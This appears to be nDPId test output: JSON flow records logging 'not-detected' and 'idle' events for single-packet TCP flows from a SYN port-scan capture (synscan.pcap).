+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 